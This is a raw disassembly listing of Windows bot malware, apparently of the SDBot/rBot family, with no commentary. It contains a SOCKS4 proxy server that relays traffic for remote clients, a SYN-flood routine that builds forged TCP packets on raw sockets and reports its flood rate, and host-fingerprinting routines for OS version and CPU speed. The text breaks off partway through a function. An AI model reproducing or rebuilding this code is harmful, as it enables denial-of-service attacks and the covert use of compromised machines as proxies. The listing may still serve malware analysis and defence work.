loc_4120E1: ; CODE XREF: sub_412078+22�j
pop edi
pop ebx
pop ebp
retn
sub_412078 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4120E5 proc near ; CODE XREF: sub_4121E2+200�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
push esi
push edi
xor ebx, ebx
mov esi, 400h
loc_4120F8: ; CODE XREF: sub_4120E5+C0�j
; sub_4120E5+F2�j
mov eax, [ebp+arg_4]
xor ecx, ecx
inc ecx
mov [ebp+var_100], eax
mov [ebp+var_104], ecx
xor eax, eax
loc_41210C: ; CODE XREF: sub_4120E5+36�j
mov edx, [ebp+arg_0]
cmp [ebp+eax*4+var_100], edx
jz short loc_41211D
inc eax
cmp eax, ecx
jb short loc_41210C
loc_41211D: ; CODE XREF: sub_4120E5+31�j
cmp eax, ecx
jnz short loc_412131
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_412131: ; CODE XREF: sub_4120E5+3A�j
push ebx
xor eax, eax
push ebx
mov ecx, 100h
lea edi, [ebp+var_504]
rep stosd
push ebx
lea eax, [ebp+var_104]
push eax
push ebx
call dword_43A448 ; select
lea eax, [ebp+var_104]
push eax
push [ebp+arg_4]
call dword_43A3F4 ; __WSAFDIsSet
test eax, eax
jz short loc_412193
push ebx
push esi
lea eax, [ebp+var_504]
push eax
push [ebp+arg_4]
call dword_43A304 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_4121DD
push ebx
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4121DD
loc_412193: ; CODE XREF: sub_4120E5+7E�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_43A3F4 ; __WSAFDIsSet
test eax, eax
jz loc_4120F8
push ebx
push esi
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_43A304 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_4121DD
push ebx
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_4]
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jnz loc_4120F8
loc_4121DD: ; CODE XREF: sub_4120E5+95�j
; sub_4120E5+AC�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4120E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4121E2 proc near ; DATA XREF: sub_412412+13F�o
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_4D4 = byte ptr -4D4h
var_4D3 = byte ptr -4D3h
var_4D2 = word ptr -4D2h
var_4D0 = dword ptr -4D0h
var_4CC = byte ptr -4CCh
var_CC = byte ptr -0CCh
var_48 = byte ptr -48h
var_30 = dword ptr -30h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 5D8h
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 2Ch
pop ecx
mov esi, edx
lea edi, [ebp+74h+var_CC]
rep movsd
mov edi, [ebp+74h+var_30]
xor eax, eax
inc eax
mov [edx+0ACh], eax
mov esi, edi
mov [ebp+74h+var_5D8], eax
imul esi, 234h
mov ecx, dword_43B24C[esi]
xor ebx, ebx
lea eax, [ebp+74h+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_5D8]
push eax
push ebx
mov [ebp+74h+arg_0], edi
mov [ebp+74h+var_C], 5
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_5D4], ecx
call dword_43A448 ; select
test eax, eax
jnz short loc_412255
push dword_43B24C[esi]
jmp loc_4123FD
; ---------------------------------------------------------------------------
loc_412255: ; CODE XREF: sub_4121E2+66�j
push ebx
push 408h
lea eax, [ebp+74h+var_4D4]
push eax
push dword_43B24C[esi]
call dword_43A304 ; recv
test eax, eax
jle loc_4123F7
cmp [ebp+74h+var_4D4], 4
jnz loc_4123F7
cmp [ebp+74h+var_4D3], 1
jnz loc_4123F7
cmp [ebp+74h+var_48], bl
jz loc_41232B
lea eax, [ebp+74h+var_48]
lea edi, [ebp+74h+var_4CC]
loc_4122A2: ; CODE XREF: sub_4121E2+DC�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_4122C4
cmp cl, bl
jz short loc_4122C0
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_4122C4
inc edi
inc edi
inc eax
inc eax
cmp cl, bl
jnz short loc_4122A2
loc_4122C0: ; CODE XREF: sub_4121E2+CA�j
xor eax, eax
jmp short loc_4122C9
; ---------------------------------------------------------------------------
loc_4122C4: ; CODE XREF: sub_4121E2+C6�j
; sub_4121E2+D4�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4122C9: ; CODE XREF: sub_4121E2+E0�j
cmp eax, ebx
jz short loc_41232B
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+var_4CC]
push eax
push offset aSocks4Authenti ; "[SOCKS4]: Authentication failed. Remote"...
call sub_401F41
add esp, 0Ch
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Dh
loc_4122F2: ; CODE XREF: sub_4121E2+1C0�j
xor eax, eax
push ebx
mov ecx, 100h
lea edi, [ebp+74h+var_4CC]
rep stosd
push 8
lea eax, [ebp+74h+var_4D4]
push eax
push dword_43B24C[esi]
call dword_43A438 ; send
loc_412317: ; CODE XREF: sub_4121E2+210�j
push dword_43B24C[esi]
call dword_43A4B0 ; closesocket
push [ebp+74h+arg_0]
jmp loc_412404
; ---------------------------------------------------------------------------
loc_41232B: ; CODE XREF: sub_4121E2+B1�j
; sub_4121E2+E9�j
xor eax, eax
lea edi, [ebp+74h+var_1C]
stosd
stosd
stosd
stosd
mov ax, [ebp+74h+var_4D2]
push 6
mov [ebp+74h+var_1A], ax
mov eax, [ebp+74h+var_4D0]
push 1
push 2
mov [ebp+74h+var_1C], 2
mov [ebp+74h+var_18], eax
call dword_43A39C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_4], eax
jnz short loc_412370
call dword_43A45C ; WSAGetLastError
push eax
push offset aSocks4ErrorFai ; "[SOCKS4]: Error: Failed to open socket("...
jmp short loc_41238E
; ---------------------------------------------------------------------------
loc_412370: ; CODE XREF: sub_4121E2+17E�j
push 10h
lea ecx, [ebp+74h+var_1C]
push ecx
push eax
call dword_43A34C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4123A7
call dword_43A45C ; WSAGetLastError
push eax
push offset aSocks4ErrorF_0 ; "[SOCKS4]: Error: Failed to connect to t"...
loc_41238E: ; CODE XREF: sub_4121E2+18C�j
call sub_401F41
pop ecx
pop ecx
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Bh
jmp loc_4122F2
; ---------------------------------------------------------------------------
loc_4123A7: ; CODE XREF: sub_4121E2+19E�j
xor eax, eax
push ebx
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Ah
mov ecx, 100h
lea edi, [ebp+74h+var_4CC]
rep stosd
push 8
lea eax, [ebp+74h+var_4D4]
push eax
push dword_43B24C[esi]
call dword_43A438 ; send
push dword_43B24C[esi]
push [ebp+74h+var_4]
call sub_4120E5
pop ecx
pop ecx
push [ebp+74h+var_4]
call dword_43A4B0 ; closesocket
jmp loc_412317
; ---------------------------------------------------------------------------
loc_4123F7: ; CODE XREF: sub_4121E2+8E�j
; sub_4121E2+9B�j ...
push dword_43B24C[esi]
loc_4123FD: ; CODE XREF: sub_4121E2+6E�j
call dword_43A4B0 ; closesocket
push edi
loc_412404: ; CODE XREF: sub_4121E2+144�j
call sub_41397A
pop ecx
push ebx
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_4121E2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_412412 proc near ; DATA XREF: sub_409806+53BF�o
var_2D4 = byte ptr -2D4h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 2D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
push 2Ch
pop ecx
xor ebx, ebx
lea edi, [ebp+74h+var_D4]
rep movsd
push [ebp+74h+var_40]
inc ebx
mov [eax+0A8h], ebx
xor eax, eax
lea edi, [ebp+74h+var_14]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_4], 10h
mov [ebp+74h+var_14], 2
call dword_43A4F4 ; ntohs
push 6
push ebx
xor esi, esi
push 2
mov [ebp+74h+var_12], ax
mov [ebp+74h+var_10], esi
call dword_43A39C ; socket
mov edi, eax
mov eax, [ebp+74h+var_3C]
imul eax, 234h
mov dword_43B24C[eax], edi
push 10h
lea eax, [ebp+74h+var_14]
push eax
push edi
call dword_43A47C ; bind
test eax, eax
jnz loc_4125A3
push 0Ah
push edi
call dword_43A4C8 ; listen
test eax, eax
jnz loc_4125A3
push [ebp+74h+var_40]
push [ebp+74h+var_D4]
call sub_408852
pop ecx
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax
call sub_416905
add esp, 10h
cmp [ebp+74h+var_30], esi
jnz short loc_4124E0
push esi
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_2D4]
push eax
lea eax, [ebp+74h+var_D0]
push eax
push [ebp+74h+var_D4]
call sub_405D20
add esp, 14h
loc_4124E0: ; CODE XREF: sub_412412+B2�j
; sub_412412+17A�j ...
lea eax, [ebp+74h+var_2D4]
push eax
call sub_401ECD
pop ecx
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_24]
push eax
push edi
call dword_43A35C ; accept
push [ebp+74h+var_3C]
mov ebx, eax
movzx eax, [ebp+74h+var_22]
push eax
push [ebp+74h+var_20]
mov [ebp+74h+var_28], esi
call dword_43A420 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4ClientCo ; "[SOCKS4]: Client connection from IP: %s"...
push eax
call sub_416905
push ebx
lea eax, [ebp+74h+var_2D4]
push 12h
push eax
call sub_4136B6
mov ecx, [ebp+74h+var_3C]
mov [ebp+74h+var_38], eax
imul eax, 234h
add esp, 20h
mov dword_43B244[eax], ecx
lea eax, [ebp+74h+arg_0]
push eax
push esi
lea eax, [ebp+74h+var_D4]
push eax
push offset sub_4121E2
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+74h+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_412599
call dword_422004 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4Failed_0 ; "[SOCKS4]: Failed to start client thread"...
push eax
call sub_416905
add esp, 0Ch
jmp loc_4124E0
; ---------------------------------------------------------------------------
loc_412591: ; CODE XREF: sub_412412+18A�j
push 5
call dword_422000 ; Sleep
loc_412599: ; CODE XREF: sub_412412+15D�j
cmp [ebp+74h+var_28], esi
jz short loc_412591
jmp loc_4124E0
; ---------------------------------------------------------------------------
loc_4125A3: ; CODE XREF: sub_412412+77�j
; sub_412412+88�j
push edi
call dword_43A4B0 ; closesocket
push [ebp+74h+var_40]
lea eax, [ebp+74h+var_2D4]
push offset aSocks4Failed_1 ; "[SOCKS4]: Failed to start server on Por"...
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+74h+var_30], esi
jnz short loc_4125E0
push esi
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_2D4]
push eax
lea eax, [ebp+74h+var_D0]
push eax
push [ebp+74h+var_D4]
call sub_405D20
add esp, 14h
loc_4125E0: ; CODE XREF: sub_412412+1B2�j
lea eax, [ebp+74h+var_2D4]
push eax
call sub_401ECD
push [ebp+74h+var_3C]
call sub_41397A
pop ecx
pop ecx
push esi
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_412412 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=68h
sub_4125FE proc near ; CODE XREF: sub_41287A+3C�p
var_288 = byte ptr -288h
var_F8 = byte ptr -0F8h
var_B8 = byte ptr -0B8h
var_B7 = byte ptr -0B7h
var_A4 = byte ptr -0A4h
var_98 = byte ptr -98h
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = byte ptr -74h
var_73 = byte ptr -73h
var_72 = word ptr -72h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = word ptr -54h
var_52 = word ptr -52h
var_50 = dword ptr -50h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
lea ebp, [esp-68h]
sub esp, 288h
and [ebp+68h+var_B8], 0
push edi
push 0Eh
pop ecx
xor eax, eax
lea edi, [ebp+68h+var_B7]
rep stosd
stosw
stosb
lea eax, [ebp+68h+var_288]
push eax
push 202h
call dword_43A3AC ; WSAStartup
test eax, eax
jz short loc_412638
xor eax, eax
jmp loc_412874
; ---------------------------------------------------------------------------
loc_412638: ; CODE XREF: sub_4125FE+31�j
push esi
xor edi, edi
inc edi
push edi
xor esi, esi
push esi
push esi
push 0FFh
push 3
push 2
call dword_43A314 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+68h+var_4], eax
jz loc_41286B
push 4
lea ecx, [ebp+68h+var_3C]
push ecx
push 2
push esi
push eax
mov [ebp+68h+var_3C], edi
call dword_43A3B8 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_412862
xor eax, eax
lea edi, [ebp+68h+var_54]
stosd
stosd
stosd
push ebx
push [ebp+68h+arg_8]
stosd
mov [ebp+68h+var_54], 2
call dword_43A4F4 ; ntohs
mov ebx, [ebp+68h+arg_0]
push 28h
mov [ebp+68h+var_52], ax
mov [ebp+68h+var_50], ebx
mov [ebp+68h+var_30], 45h
call dword_43A4F4 ; ntohs
push [ebp+68h+arg_8]
mov [ebp+68h+var_2E], ax
mov [ebp+68h+var_2C], 1
mov [ebp+68h+var_2A], si
mov [ebp+68h+var_28], 80h
mov [ebp+68h+var_27], 6
mov [ebp+68h+var_26], si
mov [ebp+68h+var_20], ebx
call dword_43A4F4 ; ntohs
push 4000h
mov [ebp+68h+var_1A], ax
mov [ebp+68h+var_14], esi
mov [ebp+68h+var_10], 50h
mov [ebp+68h+var_F], 2
call dword_43A4F4 ; ntohs
mov [ebp+68h+var_E], ax
lea eax, [ebp+68h+var_5C]
push eax
mov [ebp+68h+var_A], si
mov [ebp+68h+var_8], esi
call dword_42203C ; QueryPerformanceFrequency
lea eax, [ebp+68h+var_38]
push eax
call dword_422038 ; QueryPerformanceCounter
push [ebp+68h+var_58]
mov eax, [ebp+68h+arg_C]
push [ebp+68h+var_5C]
cdq
push edx
push eax
call sub_4171B0
add eax, [ebp+68h+var_38]
mov [ebp+68h+var_C], si
adc edx, [ebp+68h+var_34]
mov [ebp+68h+var_44], eax
mov [ebp+68h+var_40], edx
jmp short loc_412755
; ---------------------------------------------------------------------------
loc_412729: ; CODE XREF: sub_4125FE+22F�j
add [ebp+68h+var_8], eax
lea eax, [ebp+68h+var_38]
push eax
call dword_422038 ; QueryPerformanceCounter
mov eax, [ebp+68h+var_34]
cmp eax, [ebp+68h+var_40]
jg loc_41285E
jl short loc_412750
mov eax, [ebp+68h+var_38]
cmp eax, [ebp+68h+var_44]
jnb loc_41285E
loc_412750: ; CODE XREF: sub_4125FE+144�j
and [ebp+68h+var_C], 0
loc_412755: ; CODE XREF: sub_4125FE+129�j
call sub_41699A
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_43A4F4 ; ntohs
mov [ebp+68h+var_1C], ax
call sub_41699A
call sub_41699A
push eax
call dword_43A4F4 ; ntohs
push [ebp+68h+arg_4]
movzx eax, ax
mov [ebp+68h+var_18], eax
call dword_43A4CC ; ntohl
inc [ebp+68h+arg_4]
and [ebp+68h+var_74], 0
mov esi, eax
push 14h
mov [ebp+68h+var_24], esi
mov [ebp+68h+var_78], ebx
mov [ebp+68h+var_73], 6
call dword_43A4F4 ; ntohs
push 8
pop ecx
mov [ebp+68h+var_7C], esi
mov [ebp+68h+var_72], ax
push 5
lea esi, [ebp+68h+var_7C]
lea edi, [ebp+68h+var_B8]
rep movsd
pop ecx
lea eax, [ebp+68h+var_B8]
push 34h
lea esi, [ebp+68h+var_1C]
lea edi, [ebp+68h+var_98]
push eax
rep movsd
call sub_4088A8
push 5
pop ecx
push 5
lea esi, [ebp+68h+var_30]
lea edi, [ebp+68h+var_B8]
rep movsd
mov [ebp+68h+var_C], ax
pop ecx
lea esi, [ebp+68h+var_1C]
lea edi, [ebp+68h+var_A4]
rep movsd
xor eax, eax
lea edi, [ebp+68h+var_90]
stosd
lea eax, [ebp+68h+var_B8]
push 28h
push eax
call sub_4088A8
add esp, 10h
push 5
pop ecx
push 10h
mov [ebp+68h+var_26], ax
lea eax, [ebp+68h+var_54]
push eax
push 0
push 28h
lea eax, [ebp+68h+var_B8]
push eax
push [ebp+68h+var_4]
lea esi, [ebp+68h+var_30]
lea edi, [ebp+68h+var_B8]
rep movsd
call dword_43A36C ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_412729
call dword_43A45C ; WSAGetLastError
push eax
lea eax, [ebp+68h+var_F8]
push offset aSynSendErrorD_ ; "[SYN]: Send error: <%d>."
push eax
call sub_416905
lea eax, [ebp+68h+var_F8]
push eax
call sub_401ECD
add esp, 10h
xor esi, esi
jmp short loc_412861
; ---------------------------------------------------------------------------
loc_41285E: ; CODE XREF: sub_4125FE+13E�j
; sub_4125FE+14C�j
mov esi, [ebp+68h+var_8]
loc_412861: ; CODE XREF: sub_4125FE+25E�j
pop ebx
loc_412862: ; CODE XREF: sub_4125FE+74�j
push [ebp+68h+var_4]
call dword_43A4B0 ; closesocket
loc_41286B: ; CODE XREF: sub_4125FE+58�j
call dword_43A4BC ; WSACleanup
mov eax, esi
pop esi
loc_412874: ; CODE XREF: sub_4125FE+35�j
pop edi
add ebp, 68h
leave
retn
sub_4125FE endp
; =============== S U B R O U T I N E =======================================
sub_41287A proc near ; CODE XREF: sub_4128D2+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40873C
push [esp+10h+arg_4]
mov esi, eax
call sub_416C92
push [esp+14h+arg_8]
mov ebx, eax
call sub_416C92
mov edi, eax
call sub_41699A
cdq
mov ecx, 200h
idiv ecx
push edi
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4125FE
add esp, 1Ch
test eax, eax
jnz short loc_4128C3
inc eax
loc_4128C3: ; CODE XREF: sub_41287A+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_41287A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4128D2 proc near ; DATA XREF: sub_409806+2D07�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov esi, eax
mov ecx, 85h
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_41287A
push eax
lea eax, [ebp+var_414]
push offset aSynDoneWithFlo ; "[SYN]: Done with flood (%iKB/sec)."
push eax
call sub_416905
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_41294F
push esi
push [ebp+var_C]
lea eax, [ebp+var_414]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_405D20
add esp, 14h
loc_41294F: ; CODE XREF: sub_4128D2+5B�j
lea eax, [ebp+var_414]
push eax
call sub_401ECD
push [ebp+var_10]
call sub_41397A
pop ecx
pop ecx
push esi
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_4128D2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41296D proc near ; CODE XREF: start+74�p
; sub_409806+4D21�p ...
arg_0 = dword ptr 4
push esi
push edi
call dword_42201C ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
mov ecx, 15180h
mov esi, 0E10h
push 3Ch
pop edi
sub eax, [esp+8+arg_0]
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div esi
mov esi, eax
mov eax, edx
xor edx, edx
div edi
push eax
push esi
push ecx
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
mov esi, offset dword_480D24
push esi
call sub_416B5D
add esp, 18h
pop edi
mov eax, esi
pop esi
retn
sub_41296D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_4129C0 proc near ; CODE XREF: sub_403DEF+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
lea ebp, [esp-78h]
sub esp, 94h
push esi
lea eax, [ebp+78h+var_94]
push eax
xor esi, esi
mov [ebp+78h+var_94], 94h
call dword_422120 ; GetVersionExA
test eax, eax
jz short loc_412A30
cmp [ebp+78h+var_90], 4
jnz short loc_412A12
cmp [ebp+78h+var_8C], esi
jnz short loc_412A00
cmp [ebp+78h+var_84], 1
jnz short loc_4129F5
inc esi
loc_4129F5: ; CODE XREF: sub_4129C0+32�j
cmp [ebp+78h+var_84], 2
jnz short loc_412A30
xor esi, esi
inc esi
jmp short loc_412A30
; ---------------------------------------------------------------------------
loc_412A00: ; CODE XREF: sub_4129C0+2C�j
cmp [ebp+78h+var_8C], 0Ah
jnz short loc_412A0A
loc_412A06: ; CODE XREF: sub_4129C0+5B�j
push 2
jmp short loc_412A2F
; ---------------------------------------------------------------------------
loc_412A0A: ; CODE XREF: sub_4129C0+44�j
cmp [ebp+78h+var_8C], 5Ah
jnz short loc_412A30
jmp short loc_412A23
; ---------------------------------------------------------------------------
loc_412A12: ; CODE XREF: sub_4129C0+27�j
cmp [ebp+78h+var_90], 5
jnz short loc_412A30
cmp [ebp+78h+var_8C], esi
jz short loc_412A06
cmp [ebp+78h+var_8C], 1
jnz short loc_412A27
loc_412A23: ; CODE XREF: sub_4129C0+50�j
push 3
jmp short loc_412A2F
; ---------------------------------------------------------------------------
loc_412A27: ; CODE XREF: sub_4129C0+61�j
cmp [ebp+78h+var_8C], 2
jnz short loc_412A30
push 7
loc_412A2F: ; CODE XREF: sub_4129C0+48�j
; sub_4129C0+65�j
pop esi
loc_412A30: ; CODE XREF: sub_4129C0+21�j
; sub_4129C0+39�j ...
mov eax, esi
pop esi
add ebp, 78h
leave
retn
sub_4129C0 endp
; =============== S U B R O U T I N E =======================================
sub_412A38 proc near ; CODE XREF: sub_412AEE+240�p
push ebx
push esi
push edi
mov edi, 0F4240h
loc_412A40: ; CODE XREF: sub_412A38+2F�j
; sub_412A38+35�j
rdtsc
push 3E8h
mov ebx, edx
mov esi, eax
call dword_422000 ; Sleep
rdtsc
push 0
sub eax, esi
push edi
sbb edx, ebx
push edx
push eax
call sub_418480
mov esi, edx
test esi, esi
mov ebx, eax
ja short loc_412A40
jb short loc_412A6F
cmp ebx, edi
ja short loc_412A40
loc_412A6F: ; CODE XREF: sub_412A38+31�j
push 0
push 64h
push esi
push ebx
call sub_418400
mov ecx, edx
push 64h
xor edx, edx
test ecx, ecx
mov edi, eax
pop eax
ja short loc_412AE2
jb short loc_412A8E
cmp edi, 50h
jnb short loc_412A93
loc_412A8E: ; CODE XREF: sub_412A38+4F�j
push 4Bh
pop eax
xor edx, edx
loc_412A93: ; CODE XREF: sub_412A38+54�j
test ecx, ecx
ja short loc_412AE2
jb short loc_412A9E
cmp edi, 47h
jnb short loc_412AA3
loc_412A9E: ; CODE XREF: sub_412A38+5F�j
push 42h
pop eax
xor edx, edx
loc_412AA3: ; CODE XREF: sub_412A38+64�j
test ecx, ecx
ja short loc_412AE2
jb short loc_412AAE
cmp edi, 37h
jnb short loc_412AB3
loc_412AAE: ; CODE XREF: sub_412A38+6F�j
push 32h
pop eax
xor edx, edx
loc_412AB3: ; CODE XREF: sub_412A38+74�j
test ecx, ecx
ja short loc_412AE2
jb short loc_412ABE
cmp edi, 26h
jnb short loc_412AC3
loc_412ABE: ; CODE XREF: sub_412A38+7F�j
push 21h
pop eax
xor edx, edx
loc_412AC3: ; CODE XREF: sub_412A38+84�j
test ecx, ecx
ja short loc_412AE2
jb short loc_412ACE
cmp edi, 1Eh
jnb short loc_412AD3
loc_412ACE: ; CODE XREF: sub_412A38+8F�j
push 19h
pop eax
xor edx, edx
loc_412AD3: ; CODE XREF: sub_412A38+94�j
test ecx, ecx
ja short loc_412AE2
jb short loc_412ADE
cmp edi, 0Ah
jnb short loc_412AE2
loc_412ADE: ; CODE XREF: sub_412A38+9F�j
xor eax, eax
xor edx, edx
loc_412AE2: ; CODE XREF: sub_412A38+4D�j
; sub_412A38+5D�j ...
sub eax, edi
sbb edx, ecx
add eax, ebx
pop edi
adc edx, esi
pop esi
pop ebx
retn
sub_412A38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_412AEE proc near ; CODE XREF: sub_409806+4F18�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 7E8h
push ebx
push esi
push edi
lea eax, [ebp+70h+var_CC]
push eax
mov [ebp+70h+var_4], 422B0Ah
mov [ebp+70h+var_CC], 94h
call dword_422120 ; GetVersionExA
xor ebx, ebx
cmp [ebp+70h+var_C8], 4
jnz short loc_412B5F
cmp [ebp+70h+var_C4], ebx
jnz short loc_412B41
cmp [ebp+70h+var_BC], 1
jnz short loc_412B2E
mov [ebp+70h+var_4], offset a95 ; "95"
loc_412B2E: ; CODE XREF: sub_412AEE+37�j
cmp [ebp+70h+var_BC], 2
jnz loc_412BC5
mov [ebp+70h+var_4], offset aNt ; "NT"
jmp short loc_412B9C
; ---------------------------------------------------------------------------
loc_412B41: ; CODE XREF: sub_412AEE+31�j
cmp [ebp+70h+var_C4], 0Ah
jnz short loc_412B50
mov [ebp+70h+var_4], offset a98 ; "98"
jmp short loc_412B96
; ---------------------------------------------------------------------------
loc_412B50: ; CODE XREF: sub_412AEE+57�j
cmp [ebp+70h+var_C4], 5Ah
jnz short loc_412B8F
mov [ebp+70h+var_4], offset aMe_0 ; "ME"
jmp short loc_412B96
; ---------------------------------------------------------------------------
loc_412B5F: ; CODE XREF: sub_412AEE+2C�j
cmp [ebp+70h+var_C8], 5
jnz short loc_412B8F
cmp [ebp+70h+var_C4], ebx
jnz short loc_412B73
mov [ebp+70h+var_4], offset a2k ; "2K"
jmp short loc_412B96
; ---------------------------------------------------------------------------
loc_412B73: ; CODE XREF: sub_412AEE+7A�j
cmp [ebp+70h+var_C4], 1
jnz short loc_412B82
mov [ebp+70h+var_4], offset aXp_0 ; "XP"
jmp short loc_412B96
; ---------------------------------------------------------------------------
loc_412B82: ; CODE XREF: sub_412AEE+89�j
cmp [ebp+70h+var_C4], 2
mov [ebp+70h+var_4], offset a2003 ; "2003"
jz short loc_412B96
loc_412B8F: ; CODE XREF: sub_412AEE+66�j
; sub_412AEE+75�j
mov [ebp+70h+var_4], offset a??? ; "???"
